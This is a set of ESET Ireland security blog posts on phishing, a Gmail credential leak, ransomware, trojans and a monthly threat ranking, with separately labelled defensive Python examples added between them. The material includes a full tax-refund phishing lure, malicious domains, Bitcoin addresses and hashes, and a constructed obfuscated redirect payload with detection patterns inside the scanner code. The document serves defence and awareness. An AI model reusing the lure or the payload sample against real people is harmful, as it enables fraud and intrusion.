Italian job? Tax refund scam as Gaeilge in Irish mailboxes

Are we all getting €138.50 back from the taxman? No. But scammers with an Italian link are trying to convince Irish recipients they’re legit by sending a mail as Gaeilge.

ESET Ireland has detected many samples of an email, targeting Irish mailboxes, which has a subject “Tax Refund Application” and reads:

From: Revenue – Irish Tax <xxxxx@revenue.ie>

Revenue – Cin agus Custaim na hireann

Tar is na romhanna bliantil deireanach de do ghnomhaocht fioscach, n mr dinn a chinneadh go bhfuil t i dteideal a fhil ar aisoc cnach de € 138.50 EUR. Cuir do Iarratas Aisoc Cnach ag lonadh an eForm135. Beidh do aisoc a chur chuig do chuntas bainc sa 2-4 seachtaine seo chugainn.

Nta: Is fidir aisocaocht a moill ar chiseanna agsla, mar shampla, a chur isteach taifid neamhbhail n a bhfuil feidhm i ndiaidh an spriocdhta.

_______________________________________________

Revenue – Irish Tax and Customs

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of € 138.50 EUR. Complete your Tax Refund Application by filling the eForm135. Your refund will be sent to your bank account in the next 2-4 weeks.

Note: A refund can be delayed for various reasons, for example submitting invalid records or applying after the deadline.

The email prompts potential victims to fill in a form. The link, unsurprisingly, leads to a page on http://www.comunespoleto.gov.it, an Italian address, which then redirects to a fake website hosted in Australia and registered in the USA. The fake site carries all the official markings of Irish Tax and Customs and asks for personal, bank and card details, which the scammers can then use to rob the victim.

(screenshot of the forged Revenue page)

Any Irish speaker would quickly recognise the translation as a poor Google Translate job, and the scammer’s sloppy copy-paste even stripped all the accented characters from the text, which makes it rather useless as Irish, but an unfamiliar user could still be fooled because the mail and the forged website look rather official. Phishing mails like this one, using a relatively rare language to address potential victims, show that cybercriminals are targeting even small countries for a chance of profit. The long global path of the scam (Irish targets, via an Italian link, via an Australian-hosted site with an American registration) on the other hand shows the complexity of the global business that is cybercrime.

ESET Ireland recommends Irish computer users be on the lookout for scams like this one. Do not reply to the email, do not follow its bad links and never ever give your personal and banking details to such online forms.

by Urban Schrott, IT Security & Cybercrime Analyst, ESET Ireland

Five million Gmail credentials posted online

According to reports that started to appear on Reddit and other forums on September 9, some five million account credentials were published that have a Gmail address as the user name. For example, if you subscribed to a newsletter on the finegardenz.com site using gthumb99@gmail.com as your user name and the password thumbsup, then it is possible this pair has been made public. How? Possibly finegardenz.com was hacked at some point in the past.

The site where the data was published referred to itself as Bitcoin Security, and the site’s language is Russian.

Some people who reviewed the data said that in most cases, the passwords were five years old and did not allow access to their accounts. However, apparently some were still current and reports of attempts to use the credentials have been seen. The assumption is that this compromised data is a collection of credentials obtained by phishing campaigns or malware attacks over recent years.

A website called isleaked.com appeared during the day purporting to allow people to check if their Gmail address had been compromised. However, as of right now, it does not appear to be functioning correctly and frankly I would not go there. Instead, you can check your email address at this site — Have I been pwned — which is run by Troy Hunt, a trusted Microsoft MVP.

The Russian site CNews was the first to publish a story about the credentials and connected them to other recent leaks such as the one affecting Yandex, a popular search engine in Russia. Later TheDailyDot published a screenshot of leaked credentials belonging to Spanish, English and Russian speakers.

Representatives from Google and Yandex issued assurances that their systems had not been compromised, but as mentioned above, the keys had been stolen by phishing campaigns and unauthorized access to user accounts (in other words, not leaked by the system for which the credentials were created, but by users of those systems).

Obviously, Gmail account credentials themselves are of great value, given that they provide access to so many Google services, such as Google+ and Google Maps. Access to those two services alone could potentially reveal your home address and allow a stranger to see who your friends are. The lesson here is that if you use a Gmail address as a user name at some site or online service, you should NOT use your Gmail password with that. Remember: different passwords for different sites/services.
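The reuse scenario described above (a newsletter site breached, the Gmail address and the same password leaked) is easy to check mechanically. The following is an added example, not part of the original post: a Python routine that parses a combo list, normalises Gmail addresses the way Gmail does (dots and +suffixes in the local part are ignored) so aliases are caught, and reports which of your services are exposed and which share a password. The dump lines and account inventory are constructed; the address and password are the hypothetical ones from the post.

```python
import hashlib
from collections import defaultdict

# Constructed sample of a combo list in the email:password form the dump
# was reported in; the lines are invented for this example and reuse the
# hypothetical account from the post.
SAMPLE_DUMP = """\
gthumb99@gmail.com:thumbsup
G.Thumb99+garden@gmail.com:oldgardenpw
someone@yandex.ru:qwerty123
not a valid line
alice@example.com:hunter2
"""

# Constructed inventory of your own accounts: service -> (user name, password).
# Two services share one password, which is exactly the reuse the post warns about.
MY_ACCOUNTS = {
    "gmail": ("gthumb99@gmail.com", "thumbsup"),
    "finegardenz.com": ("gthumb99@gmail.com", "thumbsup"),
    "bank": ("gthumb99@gmail.com", "s3parate-and-long"),
}


def normalize_gmail(address):
    """Gmail ignores dots in the local part and anything after '+', so a dump
    entry for g.thumb99+garden@gmail.com belongs to gthumb99@gmail.com."""
    local, _, domain = address.strip().lower().partition("@")
    if domain in ("gmail.com", "googlemail.com"):
        local = local.split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def parse_dump(text):
    """Yield (normalized email, password) pairs and skip malformed lines.
    Split on the first ':' only, because passwords may themselves contain ':'."""
    for line in text.splitlines():
        email, sep, password = line.partition(":")
        if sep and "@" in email:
            yield normalize_gmail(email), password


def sha1_hex(secret):
    return hashlib.sha1(secret.encode("utf-8")).hexdigest()


def exposure_report(dump_text, accounts):
    """Compare the dump against your inventory.

    live:         services whose current password appears in the dump
    address_only: services whose user name appears, but with another password
    reused:       groups of services that share one password (fix regardless)
    Passwords are compared as SHA-1 digests so the inventory could be kept hashed.
    """
    leaked = defaultdict(set)  # normalized email -> set of leaked password digests
    for email, password in parse_dump(dump_text):
        leaked[email].add(sha1_hex(password))

    live, address_only, by_digest = [], [], defaultdict(list)
    for service, (email, password) in accounts.items():
        digest = sha1_hex(password)
        by_digest[digest].append(service)
        leaked_digests = leaked.get(normalize_gmail(email))
        if leaked_digests is None:
            continue
        (live if digest in leaked_digests else address_only).append(service)

    reused = sorted(sorted(group) for group in by_digest.values() if len(group) > 1)
    return {"live": sorted(live), "address_only": sorted(address_only), "reused": reused}


if __name__ == "__main__":
    for key, value in exposure_report(SAMPLE_DUMP, MY_ACCOUNTS).items():
        print(f"{key}: {value}")
```

Against the constructed dump, both gmail and finegardenz.com come back as live exposures (same password, leaked once), the bank account is flagged only because its user name appears, and the reuse check names the two services sharing a password even before a dump turns up.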

For safety’s sake, I just went and changed my Gmail password and I suggest you consider doing the same, even though it is a real pain. I already have two-factor authentication enabled on my Google account and recommend you do this for Google and other accounts that support it. Here is a handy list for some popular services that offer 2FA:

I hope this helps. I also hope we see some arrests of the criminals who keep exposing other people’s private information: doing so is illegal in most countries and a total jerk move wherever you live.

by Stephen Cobb, ESET & Sabrina Pagnotta, ESET LATAM

About life, universe, radio, trojans, cybercrime and everything…


…ok, maybe a bit less about the universe and everything, but definitely about radio, trojans and cybercrime. :)

Yesterday I was again given the opportunity by Community Radio Youghal 104FM to talk to their listeners about cybersecurity. As I have already pointed out in a previous blog post, ‘Listen to the radio’, along with my gratitude for the chance to help their listeners stay safe online, it is very important for people to stay informed about the latest threats, so that they know better how to avoid them.

It is the cybercriminals’ job to keep coming up with new tricks (and new variations of old ones) all the time, in order to keep making money off their victims. According to one of our surveys, one in four Irish people has lost money to cybercrime, with total damages running into hundreds of millions. On the other side, in the IT security business, it is our job to prevent that from happening. A cat and mouse, cops and robbers game, but one in which computer users can actually make a huge difference if they take proper defensive measures.

In yesterday’s radio chat, most attention was paid to a Trojan that has been hitting Irish mailboxes lately, disguised as a purchase order email. As was pointed out, the cybercriminals use people’s curiosity to get them to install the malware on their own computers, but the scary thing about the Trojan itself is that people won’t even know it is there. It doesn’t crash or slow down their computer; it just sits there quietly, leaving the computer completely open for cybercriminals to control remotely for whatever nefarious purposes they choose. They could turn it into a ‘zombie’, part of a botnet used to send spam, take part in hacking attacks or distribute illegal content. All without the owner knowing anything about it until, possibly, law enforcement shows up at their door…

So this is just one of the many types of threat preying on the unwary, and new ones are being devised by the bad guys as we speak. But the internet is not that unlike the real world. Sure, there are dangers and bad people around, but if you act responsibly and are aware of your surroundings, it is a fun and pleasant place to explore. So rather than imagining the cyber-world as a dangerous place, know its bad sides and avoid them. Want to know ‘how to’? The ‘how to’ selection on ESET Ireland’s blog is a good place to start. Or listen to the radio. ;)

by Urban Schrott, ESET Ireland

Monthly Threat Report: August 2014

(chart: Top 10 threats, August 2014)

The Top Ten Threats

 

1. Win32/Bundpil

Previous Ranking: 1

Percentage Detected: 2.18%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains a URL from which it tries to download several files over HTTP; the files are then executed. The worm may delete folders matching the following patterns:
  • *.exe
  • *.vbs
  • *.pif
  • *.cmd
  • *Backup.

2. JS/Kryptik.I

Previous Ranking: 2

Percentage Detected: 1.83%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.

 

3. Win32/Adware.MultiPlug

Previous Ranking: 7

Percentage Detected: 1.53%

Win32/Adware.MultiPlug is a Potentially Unwanted Application which, once present on the user’s system, may cause applications to display advertising pop-up windows during internet browsing.

4. Win32/RiskWare.NetFilter

Previous Ranking: 3

Percentage Detected: 1.46%

Win32/RiskWare.NetFilter is an application that includes malicious code designed to force infected computers to engage in unwanted behaviour. It allows an attacker to connect remotely to the infected system and control it in order to steal sensitive information or install other malware.

 

5. LNK/Agent.AK

Previous Ranking: 4

Percentage Detected: 1.4%

LNK/Agent.AK is a shortcut (.lnk) that concatenates commands to run the real, legitimate application or folder and, additionally, run the threat in the background. It could become the new version of the autorun.inf threat. The vulnerability it abuses became known when Stuxnet was discovered, as it was one of the four vulnerabilities that threat exploited.

 

6. Win32/Sality

Previous Ranking: 5

Percentage Detected: 1.38%

Sality is a polymorphic file infector. When run, it starts a service and creates/deletes registry keys related to security activity on the system and to ensure the malicious process starts on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

7. INF/Autorun

Previous Ranking: 8

Percentage Detected: 1.2%

INF/Autorun is a generic detection of the AUTORUN.INF configuration file created by malware. The AUTORUN.INF file contains the path to the malware executable. It is usually dropped into the root folder of available drives in an attempt to run the malware executable automatically when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes set in an attempt to hide the file in Windows Explorer.
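The AUTORUN.INF mechanism above (and the removable-media spread of Win32/Bundpil earlier in the list) is easy to triage by hand if you know which keys Windows actually acts on. The following is an added example, not part of ESET’s report or products: a small Python parser that pulls the launch targets out of an autorun.inf, flags those pointing at executables or scripts, and checks for the Hidden+System attribute combination the description mentions. The sample autorun.inf content and file names are constructed for the example.

```python
import os
import re
import stat

# Constructed autorun.inf of the kind INF/Autorun detects: every action a
# user can take on the drive is pointed at a dropped executable. The file
# names are invented for this example.
SAMPLE_AUTORUN_INF = r"""[autorun]
; comment lines and non-[autorun] sections must be ignored
open=setup.exe
shellexecute=RECYCLER\update.exe
shell\Open\command=RECYCLER\update.exe
shell\Explore\command=rundll32.exe RECYCLER\update.dll,Install
action=Open folder to view files
icon=%SystemRoot%\system32\shell32.dll,4
label=Holiday photos
[Content]
MusicFiles=false
"""

LAUNCH_KEYS = ("open", "shellexecute")
SHELL_COMMAND_RE = re.compile(r"^shell\\[^\\=]+\\command$", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".cmd", ".bat", ".com", ".vbs", ".dll")


def launch_targets(inf_text):
    """Return (key, command) pairs that Windows would run from the [autorun]
    section: open=, shellexecute= and shell\\<verb>\\command= entries.
    Cosmetic keys (icon, label, action) are ignored."""
    targets, section = [], None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key in LAUNCH_KEYS or SHELL_COMMAND_RE.match(key):
            targets.append((key, value.strip()))
    return targets


def suspicious_targets(inf_text):
    """Launch targets whose program is an executable or script: the
    'path to the malware executable' the detection description refers to."""
    hits = []
    for key, command in launch_targets(inf_text):
        # the program is the first token; ',entrypoint' and arguments follow
        program = command.split(",")[0].split()
        if program and program[0].lower().endswith(EXECUTABLE_EXT):
            hits.append((key, command))
    return hits


def hidden_and_system(path):
    """True when the file carries both the Hidden and System attributes.
    st_file_attributes only exists on Windows; elsewhere this returns False."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    mask = stat.FILE_ATTRIBUTE_HIDDEN | stat.FILE_ATTRIBUTE_SYSTEM
    return attrs & mask == mask


def scan_drive_root(root):
    """Inspect <root>\\autorun.inf on a mounted drive; None if there is none."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8", errors="replace") as handle:
        text = handle.read()
    return {"targets": suspicious_targets(text), "hidden_system": hidden_and_system(path)}


if __name__ == "__main__":
    for key, command in suspicious_targets(SAMPLE_AUTORUN_INF):
        print(f"{key} -> {command}")
```

Run scan_drive_root("E:\\") (or the mount point of a USB stick on another OS) to apply the same logic to a real drive; only the [autorun] section is honoured, so a key such as open= placed under another section heading is correctly ignored.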

 

8. HTML/ScrInject

Previous Ranking: 6

Percentage Detected: 1.13%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to a malware download.
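Both JS/Kryptik (item 2) and HTML/ScrInject have the same shape: a script or iframe injected into an otherwise normal page that hands the browser off to a malicious URL. As an added example (not ESET’s detection logic, which is signature-based), here is a heuristic scanner in Python that flags CSS-hidden or 1x1 iframes and inline scripts that combine heavy %XX escaping with unescape()/eval()/document.write(). The HTML sample is constructed; 203.0.113.7 is a documentation address, nothing in it is live.

```python
import re

# Constructed page fragment combining both patterns: a 1x1, CSS-hidden
# iframe pulling content from a foreign host, and an inline script that
# unpacks a percent-encoded payload through unescape() and document.write().
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://203.0.113.7/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>var a="%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%32%30%33%2E%30%2E%31%31%33%2E%37%2F%27%3B%3C%2F%73%63%72%69%70%74%3E";document.write(unescape(a));</script>
<script src="/js/jquery.min.js"></script>
<script>function greet(name){return "Hello, " + name;}</script>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.IGNORECASE)
ESCAPE_RE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.IGNORECASE)
# Calls that are common in legitimate code one at a time, but rarely together
# with heavy escaping: the unpack-and-execute idiom of obfuscated redirectors.
SUSPICIOUS_CALLS = ("eval(", "unescape(", "document.write(", "fromcharcode(", "atob(")


def parse_attrs(tag_body):
    """Attribute name -> value for the inside of a tag (names lowercased)."""
    attrs = {}
    for match in ATTR_RE.finditer(tag_body):
        attrs[match.group(1).lower()] = next(g for g in match.groups()[1:] if g is not None)
    return attrs


def dimension(attrs, name):
    """Numeric part of a width/height attribute, or None if absent."""
    digits = re.sub(r"\D", "", attrs.get(name, ""))
    return int(digits) if digits else None


def escape_density(script_body):
    """Share of the script text made up of %XX, \\xXX or \\uXXXX escapes."""
    escaped_chars = sum(len(m.group(0)) for m in ESCAPE_RE.finditer(script_body))
    return escaped_chars / max(len(script_body), 1)


def scan_html(html):
    """Return (kind, source, reasons) findings. Any hidden iframe is reported;
    an inline script needs two or more indicators to keep false positives down."""
    findings = []
    for match in IFRAME_RE.finditer(html):
        attrs = parse_attrs(match.group(1))
        reasons = []
        if any(d is not None and d <= 1 for d in (dimension(attrs, "width"), dimension(attrs, "height"))):
            reasons.append("near-zero size")
        if HIDDEN_STYLE_RE.search(attrs.get("style", "")):
            reasons.append("hidden by CSS")
        if reasons:
            findings.append(("iframe", attrs.get("src", ""), reasons))

    for match in SCRIPT_RE.finditer(html):
        body = match.group(2)
        lowered = body.lower()
        reasons = [call for call in SUSPICIOUS_CALLS if call in lowered]
        density = escape_density(body)
        if density > 0.3:
            reasons.append(f"escape density {density:.2f}")
        if len(reasons) >= 2:
            findings.append(("script", parse_attrs(match.group(1)).get("src", "inline"), reasons))
    return findings


if __name__ == "__main__":
    for kind, source, reasons in scan_html(SAMPLE_HTML):
        print(kind, source, ", ".join(reasons))
```

Note what is deliberately not flagged: a script that only calls eval(), and an external jQuery include. Real injection campaigns rotate the payload constantly, which is why a heuristic like this sits alongside, not instead of, the signature-based detections in the list.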

 

9. Win32/Ramnit

Previous Ranking: n/a

Percentage Detected: 1.1%

Win32/Ramnit is a file infector that executes on every system start. It infects DLL and EXE files and also searches for HTM and HTML files to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

 

10. Win32/Conficker

Previous Ranking: 9

Percentage Detected: 1.08%

Win32/Conficker is a worm that spreads by exploiting a vulnerability in the Windows Server service. The file is run-time compressed using UPX. When executed, the worm copies itself into the %system% folder using the name %variable%.dll.

The worm starts an HTTP server on a random port and connects to remote machines on TCP port 445 in an attempt to exploit the Server service vulnerability. If successful, the remote computer connects back to the infected computer and downloads a copy of the worm.

The worm will attempt to download several files from the Internet, which are then executed; it contains a list of URLs for this purpose. Windows Firewall is disabled. The vulnerability is described in Microsoft Security Bulletin MS08-067.
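The propagation pattern described above (one host probing many neighbours on TCP/445, and an exploited victim then connecting back to the infected host on a random port to fetch the worm) is visible in flow logs even without a signature. The following is an added detection example, not from ESET’s report: the flow records are constructed, and the thresholds are assumptions to be tuned for the network in question.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records (start time, source, destination, destination port),
# invented for this example. 10.0.0.5 behaves like the infected host described
# above: it probes many neighbours on TCP/445, and an exploited neighbour then
# connects back to it on a random high port to fetch the worm.
FLOWS = [
    ("2014-08-12 09:00:00", "10.0.0.5", "10.0.0.20", 445),
    ("2014-08-12 09:00:01", "10.0.0.5", "10.0.0.21", 445),
    ("2014-08-12 09:00:01", "10.0.0.5", "10.0.0.22", 445),
    ("2014-08-12 09:00:02", "10.0.0.5", "10.0.0.23", 445),
    ("2014-08-12 09:00:02", "10.0.0.5", "10.0.0.24", 445),
    ("2014-08-12 09:00:03", "10.0.0.5", "10.0.0.25", 445),
    ("2014-08-12 09:00:03", "10.0.0.5", "10.0.0.26", 445),
    ("2014-08-12 09:00:04", "10.0.0.5", "10.0.0.27", 445),
    ("2014-08-12 09:00:04", "10.0.0.5", "10.0.0.28", 445),
    ("2014-08-12 09:00:05", "10.0.0.5", "10.0.0.29", 445),
    ("2014-08-12 09:00:06", "10.0.0.29", "10.0.0.5", 51342),  # victim fetches the worm
    ("2014-08-12 09:00:10", "10.0.0.31", "10.0.0.2", 445),    # ordinary file-server use
    ("2014-08-12 09:00:11", "10.0.0.32", "10.0.0.2", 445),
    ("2014-08-12 09:05:00", "10.0.0.5", "10.0.0.30", 445),
]

SCAN_THRESHOLD = 8                    # distinct TCP/445 targets from one source ...
SCAN_WINDOW = timedelta(seconds=60)   # ... within this sliding window (assumed values)
CALLBACK_WINDOW = timedelta(seconds=30)


def parse_flows(flows):
    """Time-ordered (datetime, src, dst, dport) tuples."""
    return sorted((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), src, dst, dport)
                  for ts, src, dst, dport in flows)


def detect_smb_scanners(flows, threshold=SCAN_THRESHOLD, window=SCAN_WINDOW):
    """Sources that touched >= threshold distinct hosts on TCP/445 within any
    window. Returns {source: most distinct targets seen in one window}."""
    per_source = defaultdict(list)
    for ts, src, dst, dport in parse_flows(flows):
        if dport == 445:
            per_source[src].append((ts, dst))

    scanners = {}
    for src, events in per_source.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {dst for _, dst in events[start:end + 1]}
            if len(distinct) >= threshold:
                scanners[src] = max(len(distinct), scanners.get(src, 0))
    return scanners


def detect_callbacks(flows, scanners, window=CALLBACK_WINDOW):
    """(infected host, victim, port) where a host probed on 445 by a scanner
    connected back to that scanner on a non-445 port shortly afterwards:
    the 'connect to the infected computer and download a copy' step."""
    ordered = parse_flows(flows)
    probes = [(ts, src, dst) for ts, src, dst, dport in ordered
              if src in scanners and dport == 445]
    callbacks = []
    for ts, src, dst, dport in ordered:
        if dst not in scanners or dport == 445:
            continue
        recently_probed = any(p_src == dst and p_dst == src and
                              timedelta(0) <= ts - p_ts <= window
                              for p_ts, p_src, p_dst in probes)
        if recently_probed:
            callbacks.append((dst, src, dport))
    return callbacks


if __name__ == "__main__":
    scanners = detect_smb_scanners(FLOWS)
    print("scanners:", scanners)
    print("callbacks:", detect_callbacks(FLOWS, scanners))
```

The callback correlation is what separates a worm from a noisy vulnerability scanner or a misconfigured backup job: a legitimate scanner does not make its targets connect back to it on an arbitrary high port a second later.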

UK under attack by ‘Royal Mail’ phishing, carrying TorrentLocker

Three weeks ago, iSIGHT Partners discovered new ransomware encrypting victims’ documents. They dubbed this new threat TorrentLocker. TorrentLocker propagates via spam messages containing a link to a phishing page where the user is asked to download and execute “package tracking information”. In August, only Australians were targeted, with a fake Australian Post package-tracking page.

While tracking this new threat, ESET researchers found the malicious gang is targeting new victims. Internet users from the United Kingdom should be aware that fake Royal Mail package-tracking pages are online and distributing TorrentLocker.

Royal Mail phishing page

The scheme is the same: you type a captcha, then click to download a zip file containing the executable payload. It is interesting to note that the fake Royal Mail page is only shown if the visitor is from the UK; the filtering seems to be based on the IP address of the request. If the request does not come from a UK IP address, the visitor is redirected to google.com. Three new domains are hosting the fake Royal Mail page:

  • royalmail-tracking.info
  • royalmail-tracking.biz
  • royalmail-tracking.org

royalmail-tracking.info registration information

As you can see, the registration date for these domains is September 2nd, so this campaign started very recently.

Executable file properties

Encrypted files in users’ pictures

Warning shown upon execution of the malware

Once installed, the victim’s documents are encrypted and a ransom of 350 GBP is demanded if paid within 72 hours, or 700 GBP otherwise. Payment is made via a Bitcoin transaction (1.19 BTC or 2.38 BTC). To hide their infrastructure, the web server is hosted as a .onion service on the Tor network.

To make it easy for victims to access the web page, TorrentLocker provides links to Tor2Web nodes, so they don’t have to install additional software to reach the .onion site. Interestingly, door2tor.org, the domain name of one of the suggested Tor2Web nodes, was registered only 2 weeks ago. Perhaps its only purpose is to allow TorrentLocker’s victims to contact the server selling the decryption software.

“Decryption software” sold on the Tor network

This threat carries the TorrentLocker name because it uses the “Bit Torrent Application” Windows registry key to store its settings. It is unrelated to the BitTorrent protocol.

The Bitcoin trail

Bitcoin transaction details

As discovered by iSIGHT Partners, the Australian variant they analysed asked for Bitcoins to be sent to 15aBFwoT5epvRK69Zyq7Z7HMPS7kvBN8Fg. In our case, the Bitcoin address has changed to 13qm2ezhWSHWzMsGcxtKDhKNnchfP5Sp3X. If you look at the transactions of both wallets, the Bitcoins are then transferred to 17gH1u6VJwhVD9cWR59jfeinLMzag2GZ43.

Since March 2014, this Bitcoin wallet has transferred over 82,272 BTC. With 1 BTC currently valued at US$480, the total transactions are roughly equal to US$40 million. This wallet has been associated with other scams in the past, including wallet stealing and selling fake mining hardware. We do not know whether this account is owned by the TorrentLocker gang or is some kind of exchange service used by different groups.
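The hand-traced flow above (two ransom addresses whose funds end up in one consolidation address) can be done against a transaction list. The following is an added Python example, not part of the original post: only the three Bitcoin addresses come from the post; the transaction ids, the victim and change addresses and the amounts are constructed, and in practice would be fetched from a block-explorer API rather than typed in.

```python
from collections import defaultdict, deque

# The three addresses named in the post.
RANSOM_ADDRESSES = {
    "15aBFwoT5epvRK69Zyq7Z7HMPS7kvBN8Fg": "Australian campaign (iSIGHT Partners)",
    "13qm2ezhWSHWzMsGcxtKDhKNnchfP5Sp3X": "UK campaign (this post)",
}
CONSOLIDATION = "17gH1u6VJwhVD9cWR59jfeinLMzag2GZ43"

# Constructed, simplified ledger: each entry is {"id", "in": [addresses spent
# from], "out": [(address, BTC)]}. Amounts and ids are invented for this
# example. Ransom tiers are 1.19 BTC (350 GBP) and 2.38 BTC (700 GBP).
TXS = [
    {"id": "t1", "in": ["victim-a"], "out": [("15aBFwoT5epvRK69Zyq7Z7HMPS7kvBN8Fg", 1.19), ("victim-a-change", 0.31)]},
    {"id": "t2", "in": ["victim-b"], "out": [("13qm2ezhWSHWzMsGcxtKDhKNnchfP5Sp3X", 1.19), ("victim-b-change", 0.05)]},
    {"id": "t3", "in": ["victim-c"], "out": [("13qm2ezhWSHWzMsGcxtKDhKNnchfP5Sp3X", 2.38)]},
    {"id": "t4", "in": ["15aBFwoT5epvRK69Zyq7Z7HMPS7kvBN8Fg"], "out": [(CONSOLIDATION, 1.19)]},
    {"id": "t5", "in": ["13qm2ezhWSHWzMsGcxtKDhKNnchfP5Sp3X"], "out": [(CONSOLIDATION, 3.57)]},
    {"id": "t6", "in": [CONSOLIDATION], "out": [("exchange-deposit", 4.76)]},
]


def build_spend_graph(txs):
    """address -> [(recipient, amount)] over every transaction spending from it."""
    graph = defaultdict(list)
    for tx in txs:
        for spender in tx["in"]:
            graph[spender].extend(tx["out"])
    return graph


def downstream(address, graph, max_hops=3):
    """Breadth-first walk along outputs; returns {reached address: hops}."""
    hops = {address: 0}
    queue = deque([address])
    while queue:
        current = queue.popleft()
        if hops[current] >= max_hops:
            continue
        for recipient, _ in graph.get(current, []):
            if recipient not in hops:
                hops[recipient] = hops[current] + 1
                queue.append(recipient)
    return hops


def common_sinks(start_addresses, txs, max_hops=3):
    """Addresses that funds from every start address flow into, nearest first.
    The first entry is the 'follow the money' answer the post gives by hand."""
    graph = build_spend_graph(txs)
    reach = [downstream(addr, graph, max_hops) for addr in start_addresses]
    shared = set.intersection(*(set(r) for r in reach)) - set(start_addresses)
    return sorted(shared, key=lambda addr: (sum(r[addr] for r in reach), addr))


def received(address, txs):
    """Total BTC paid to an address, rounded to satoshis."""
    return round(sum(amt for tx in txs for addr, amt in tx["out"] if addr == address), 8)


def count_ransom_payments(address, txs, tiers=(1.19, 2.38), tolerance=0.005):
    """How many payments to the address match each ransom tier."""
    counts = {tier: 0 for tier in tiers}
    for tx in txs:
        for addr, amt in tx["out"]:
            if addr == address:
                for tier in tiers:
                    if abs(amt - tier) <= tolerance:
                        counts[tier] += 1
    return counts


if __name__ == "__main__":
    print("common sinks:", common_sinks(list(RANSOM_ADDRESSES), TXS))
    for addr, label in RANSOM_ADDRESSES.items():
        print(label, received(addr, TXS), count_ransom_payments(addr, TXS))
```

Counting outputs that match the ransom tiers is how you estimate the number of paying victims per campaign; following the spend graph a few hops is how you notice that otherwise unrelated campaigns share a cash-out point, which is the observation the post makes about the 17gH… wallet.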

Screenshot of a discussion on Hashtalk (now offline, retrieved from Google Cache)

ESET products detect this threat as Win32/Filecoder.NCC or Win32/Injector.

SHA-1 hashes

  • 491C8276667074B502BD98B98C74E4515A32189B (exe)
  • 46A2426D7E062E76D49707B58A5DF28547CBC0F4 (zip)
  • 7C62651C5F4CB1C780C8E9C4692F3BF24208A61E (exe)


by Marc-Etienne M.Léveillé, ESET

AV-Comparatives Declares: “ESET Cyber Security Pro for Mac Provides Outstanding Protection”


ESET Cyber Security Pro achieved excellent results in the latest AV-Comparatives testing of protection for Mac users against Mac-specific and Windows malware.

ESET Cyber Security Pro, the Internet security software for Mac, was highlighted as outstanding by AV-Comparatives’ Mac Security Test and Review 2014. Testing by AV-Comparatives was for the detection of cross-platform malware targeting a wide range of platforms.

The AV-Comparatives test looked, among other things, at the malware and phishing alerts of Mac security software. With regard to the ESET product tested, it found the following:

ESET Cyber Security Pro provides outstanding protection against malware with a well-designed user interface. The main program window makes essential functions and information easily accessible and alerts are sensible. The help facilities are exemplary. ESET produced a perfect score in our malware tests, identifying all samples of both Mac and Windows malware.

“We are pleased that ESET Cyber Security Pro scored a perfect 100% in the latest AV-Comparatives test. Proven technology found in all ESET’s products provides comprehensive proactive protection against all known and unknown forms of threats targeting Mac users,” adds Ignacio Sbampato, ESET Chief Sales and Marketing Officer.

ESET Cyber Security Pro offers users a number of improved native functions together with a low system footprint, delivering a Mac-like feel. ESET’s solution not only protects Macs, it also eliminates Windows- and Linux-based threats, preventing Macs from becoming a platform for spreading malware. The new Anti-Phishing module ensures a high level of protection as users browse online.

The Irish are being emailed a trojan downloader

ESET Ireland finds a trojan downloader disguised as a purchase order email.

An email with a malicious attachment has been identified by ESET Ireland. The email pretends to be a “purchase order” confirmation email, but has an archive file attached. The email reads:

(screenshot of the email)

The receiver of the email is usually alarmed about a “purchase” they never made and wants to investigate by having a closer look at the “detailed information on your purchase” the email mentions.

The attachment, however, doesn’t offer any “information”; instead it contains an executable file carrying a variant of a trojan downloader, which ESET detects as Win32/TrojanDownloader.Elenoocka. Elenoocka is a trojan that tries to download other malware from the Internet. It contains a list of 6 URLs and attempts to download several files from those addresses. The files can contain the Win32/Kryptik.CKEY trojan, from the rather nasty Kryptik family, which creates malicious system files that hide deep inside the operating system, avoiding detection and essentially opening the computer to any infection the cybercriminals want to send its way.

A computer infected by a trojan like this one can be used by cybercriminals as a part of a botnet, without the owner even knowing and used for hacking attacks, distributing illegal content or sending spam.

ESET Ireland advises Irish computer users to avoid opening any unknown attachments to emails, particularly emails like this one, which are designed to play on people’s curiosity.

